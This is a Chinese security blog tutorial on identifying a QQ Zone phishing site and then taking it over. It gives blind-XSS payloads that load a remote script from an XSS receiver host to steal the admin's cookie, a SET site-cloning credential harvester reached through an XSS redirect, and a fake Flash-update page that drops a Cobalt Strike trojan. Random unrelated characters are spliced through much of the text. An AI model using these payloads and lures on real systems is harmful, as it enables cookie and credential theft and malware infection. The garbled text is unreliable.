鑒別網(wǎng)站

下面是一個(gè)經(jīng)典的 QQ 空間釣魚網(wǎng)站：

域名分析

釣魚網(wǎng)站最直觀的就是看域名忘分，可以看到目標(biāo)網(wǎng)站域名 ：qq.xps.com 盡管域名中出現(xiàn)了 qq 字樣朋其，但是一級(jí)域名卻是 xps.com 這一點(diǎn)就直接暴露了釣魚網(wǎng)站的本性怒竿。

早期還有一種利用拉丁字母注冊(cè)的域名偽造釣魚網(wǎng)站的案例，這種就比較逼真了，下面國(guó)光簡(jiǎn)單列舉一些：

OPPO 官網(wǎng) 真假域名

# 真域名www.oppo.com# 假域名www.οppο.com

Pornhub 官網(wǎng)真假域名

# 真域名www.pornhub.com# 假域名www.ρornhub.com

唯品會(huì)官網(wǎng) 真假域名

# 真域名www.vip.com# 假域名www.νip.com

關(guān)于這類域名就不再列舉了拍屑，早期這種方法成功率是非常的高的荷辕，有時(shí)候甚至都可以欺騙到我們這種專業(yè)的信息安全從業(yè)者凿跳。

功能分析

釣魚網(wǎng)站既然是要釣魚的話，說那么多半還會(huì)有后臺(tái)管理功能疮方。所以使用常規(guī)的目錄掃描工具多半可以掃描出一些端倪出來：

dirsearch -u"http://qq.xps.com/"-e * -x301

果然掃描出了這個(gè) QQ 空間釣魚網(wǎng)站的后臺(tái)登錄口了：http://qq.xps.com/admin/login.php

至此基本上已經(jīng)可以確定這個(gè)目標(biāo)網(wǎng)站就是傳說中的釣魚網(wǎng)站了控嗜，下面來看一下這個(gè)釣魚網(wǎng)站是如何運(yùn)作的吧。

釣魚流程

小白用戶前臺(tái)輸入自己的 QQ 賬號(hào)和密碼信息骡显，點(diǎn)擊登錄后域名跳轉(zhuǎn)到真正的 QQ 官網(wǎng)：

然后用戶再輸入自己的 QQ 賬號(hào)和密碼就可以成功登陸了疆栏。

目前很多釣魚網(wǎng)站都是這種思路，這可以讓被釣者產(chǎn)生一種自己第一次是密碼不小心輸入錯(cuò)誤的錯(cuò)覺惫谤，從而放松警惕壁顶，妙啊溜歪！真是妙蛙種子吃著妙脆角若专，妙進(jìn)了米奇妙妙屋 妙到家了

然后釣魚網(wǎng)站的管理員每天會(huì)到自己的 QQ 空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了：

可以看到上鉤者的 QQ 號(hào)為：1314520 密碼為：sbhac... 唉，不對(duì)勁蝴猪？貌似自己被羞辱了一番......

攻擊思路

本文主要是來梳理一下 XSS 常劍的攻擊思路调衰，關(guān)于 XSS 以為的思路不在本文的敘述范圍內(nèi)，另外如果有小伙伴要不錯(cuò)新的姿勢(shì)的話歡迎評(píng)論區(qū)里面或者郵件留言自阱，國(guó)光日后會(huì)繼續(xù)完善本文的嚎莉。

思路一：XSS 盲打

如果目標(biāo)網(wǎng)站存在 XSS 的話且沒有 httponly 防御 cookie 那么就可以直接盲打 XSS。首先準(zhǔn)備一個(gè) XSS 靶場(chǎng)沛豌，國(guó)光這里比較推薦 Github 上面開源的藍(lán)蓮花 XSS 平臺(tái)萝喘。

官方項(xiàng)目地址為：https://github.com/firesunCN/BlueLotus_XSSReceiver

可惜已經(jīng)清空數(shù)據(jù)了，還好國(guó)光我 fork 了一份：

國(guó)光 fork 的項(xiàng)目地址為：https://github.com/sqlsec/BlueLotus_XSSReceiver

然后使用 XSS 平臺(tái)里面的模塊來生成一個(gè) XSS payload：

<scriptsrc="http://10.20.24.244/xss/myjs/x.js"></script>

可以去掉多余的雙引號(hào)：

<scriptsrc=http://10.20.24.244/xss/myjs/x.js></script>

然后回到釣魚網(wǎng)站前臺(tái)，在用戶名或者密碼出插入 payload（理論上來說 密碼處成功率要高一點(diǎn)）阁簸，如果有表單長(zhǎng)度限制的話爬早，可以手工審查元素修改 input 的長(zhǎng)度限制：

這樣黑客攻擊的步驟基本上就走完了，下面回到釣魚網(wǎng)站管理員的視角启妹。

釣魚網(wǎng)站的搭建者到自己的 QQ 空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了：

發(fā)現(xiàn)真的有菜雞上鉤筛严，密碼居然是 1111111111 嘴角忍不住上仰。

此時(shí)他不知道的是饶米，用戶賬號(hào)旁邊實(shí)際上有一串 JS 代碼被解析了桨啃，而此時(shí)黑客在 XSS 平臺(tái)里面可以直接看到管理員已經(jīng)上鉤了：

可以直接看到管理員的后臺(tái)地址和 cookie 信息，拿到后臺(tái)地址和 Cookie 信息就可以直接抓包替換 Cookie 登錄到釣魚網(wǎng)站的后臺(tái)檬输，這些基本操作國(guó)光我就不在啰嗦了照瘾，下面來說一下另一種思路。

思路二：SET 釣魚

假設(shè)目標(biāo)網(wǎng)站存在 httppnly 的話丧慈，我們拿到的 cookie 信息也是不完整的析命，所以傳統(tǒng)的思路是行不通的，這種情況下該怎么辦呢逃默？仔細(xì)想想鹃愤，既然不能正面肛 httponly 的話，那么為什么不考慮繞過他呢完域？

下面國(guó)光主要描述一下如何使用 Kali Linux 里面的 set 社工工程學(xué)工具包來進(jìn)行釣魚软吐。

SET 在 Kali Linux 里面的全稱是 social engineering toolkit：

Github 項(xiàng)目地址為：https://github.com/trustedsec/social-engineer-toolkit

點(diǎn)擊即可直接啟動(dòng)，首先會(huì)看到如下的菜單：

Select from the menu:1)Social-Engineering Attacks# 社會(huì)工程攻擊2)Penetration Testing(Fast-Track)# 滲透測(cè)試（快速通道）3)Third Party Modules# 第三方模塊4)Update the Social-Engineer Toolkit# 更新 SET5)Update SET configuration# 更新 SET 配置6)Help, Credits, and About# 幫助99)Exit the Social-Engineer Toolkit# 退出set>1

選擇 1 后進(jìn)入到下面的菜單：

Select from the menu:1)Spear-Phishing Attack Vectors# 魚叉式網(wǎng)絡(luò)釣魚攻擊2)Website Attack Vectors# 網(wǎng)站攻擊3)Infectious Media Generator# 感染性介質(zhì)生成4)Create a Payload and Listener# 創(chuàng)建 Payload 和 監(jiān)聽器5)Mass Mailer Attack# 群發(fā)郵件6)Arduino-Based Attack Vector# 基于 Arduino 的攻擊7)Wireless Access Point Attack Vector# 無線接入點(diǎn)攻擊8)QRCode Generator Attack Vector# 二維碼生成器攻擊9)Powershell Attack Vectors# Powershell 攻擊10)Third Party Modules# 第三方模塊99)Return back to the main menu.# 返回主菜單set>2

選擇 2 后進(jìn)入到下面的菜單：

1)Java Applet Attack Method# Java Applet 攻擊2)Metasploit Browser Exploit Method# Metasploit Browser 瀏覽器攻擊3)Credential Harvester Attack Method# 憑證竊取攻擊4)Tabnabbing Attack Method# 標(biāo)簽頁(yè)劫持? ? ? 5)Web Jacking Attack Method# 網(wǎng)頁(yè)劫持攻擊6)Multi-Attack Web Method# 綜合網(wǎng)頁(yè)攻擊7)HTA Attack Method# HTA 攻擊99)Return to Main Menu# 返回主菜單set:webattack>3

選擇 3 進(jìn)入到下面的菜單：

1)Web Templates# 網(wǎng)站模板2)Site Cloner# 站點(diǎn)克隆3)Custom Import# 自定義導(dǎo)入99)Return to Webattack Menu# 返回主菜單set:webattack>2

選擇 2 然后具體看下下面的操作：

這個(gè)時(shí)候一個(gè)假的釣魚網(wǎng)站就制作完成了吟税，訪問 Kali Linux 的 80 端 10.20.25.39 效果如下：

這個(gè)登錄入口和 qq.xps.com/admin/login.php 的登錄口一模一樣：

現(xiàn)在的任務(wù)就是想辦法讓管理員在假的網(wǎng)站里面輸入網(wǎng)站的后臺(tái)用戶名和密碼信息凹耙，那么該怎么誘導(dǎo)管理員點(diǎn)擊呢？對(duì)肠仪，聰明的網(wǎng)友肯定想到了使兔，還是利用 XSS，準(zhǔn)備下方的 payload藤韵，這個(gè) XSS 的作用就是普通的鏈接跳轉(zhuǎn)：

<script>window.location.</script>

然后將這個(gè) payload 插入到釣魚網(wǎng)站的后臺(tái)中：

此時(shí)管理員到自己的 QQ 空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了，結(jié)果沒想到網(wǎng)站瀏覽器卻跳轉(zhuǎn)到了：10.20.25.39 頁(yè)面熊经，這個(gè)就是我們制作的假的QQ 空間釣魚管理中心的登錄界面泽艘。

如果管理員大意的話，這個(gè)時(shí)候會(huì)以為登錄會(huì)話超期了镐依，需要重新登錄匹涮，就在我們假的網(wǎng)站后臺(tái)里面輸入了真正的密碼：

我們這個(gè)假的網(wǎng)站也非常妙，登錄后自動(dòng)轉(zhuǎn)發(fā)到正確的網(wǎng)站登錄成功槐壳，真是學(xué)以致用呀~~

管理員放松警惕的同時(shí)然低，我們的 Kali Linux 里也竊取到管理員的明文賬號(hào)和密碼信息了：

拿到這個(gè)后臺(tái)就可以成功登陸了，Bingo ~

當(dāng)然如果管理員是一個(gè)有很高安全意識(shí)的人，可能是不會(huì)上當(dāng)?shù)啮ㄈ粒景咐齼H供意淫參考使用带兜，實(shí)際運(yùn)用還是得看運(yùn)氣。

思路三：Flash 釣魚

這也是 B 站 視頻里面提到過的方法吨灭，首先我們需要準(zhǔn)備一個(gè)釣魚頁(yè)面刚照，這里在 Github 上搜索到了 2 個(gè) 相關(guān)的項(xiàng)目，下面分別展示一下：

項(xiàng)目地址：https://github.com/Wileysec/adobe-flash-phishing-page

模仿的 Flash Player 中文官網(wǎng)的頁(yè)面

項(xiàng)目地址：?https://github.com/r00tSe7en/Flash-Pop

這種的就要稍微激進(jìn)一點(diǎn)喧兄，強(qiáng)迫癥都會(huì)忍不住去點(diǎn)擊下載的：

國(guó)光這里選擇了第 2 種激進(jìn)的方法无畔，點(diǎn)擊立即升級(jí)的這個(gè)按鈕點(diǎn)擊會(huì)下載好國(guó)光我準(zhǔn)備好的 CS 木馬。如果管理員以為自己的 Flash 版本過低的話吠冤，可能會(huì)下載并運(yùn)行這個(gè)木馬：

這里偷懶了沒有給 Flash.exe 添加圖標(biāo)偽造一下浑彰，關(guān)于圖標(biāo)偽造大家可以參考之前的文章：

為 Cobalt Strike exe 木馬添加圖標(biāo)

如果順利的話就會(huì)成功上線 CS：

總結(jié)

免責(zé)聲明：本文出現(xiàn)的思路案例僅供網(wǎng)絡(luò)安全學(xué)習(xí)和研究技術(shù)使用，禁止使用本文的攻擊技術(shù)工具用于非法用途拯辙，否則后果自負(fù)郭变，另外文中所使用的 QQ 空間釣魚網(wǎng)站是人為修改的漏洞靶場(chǎng)。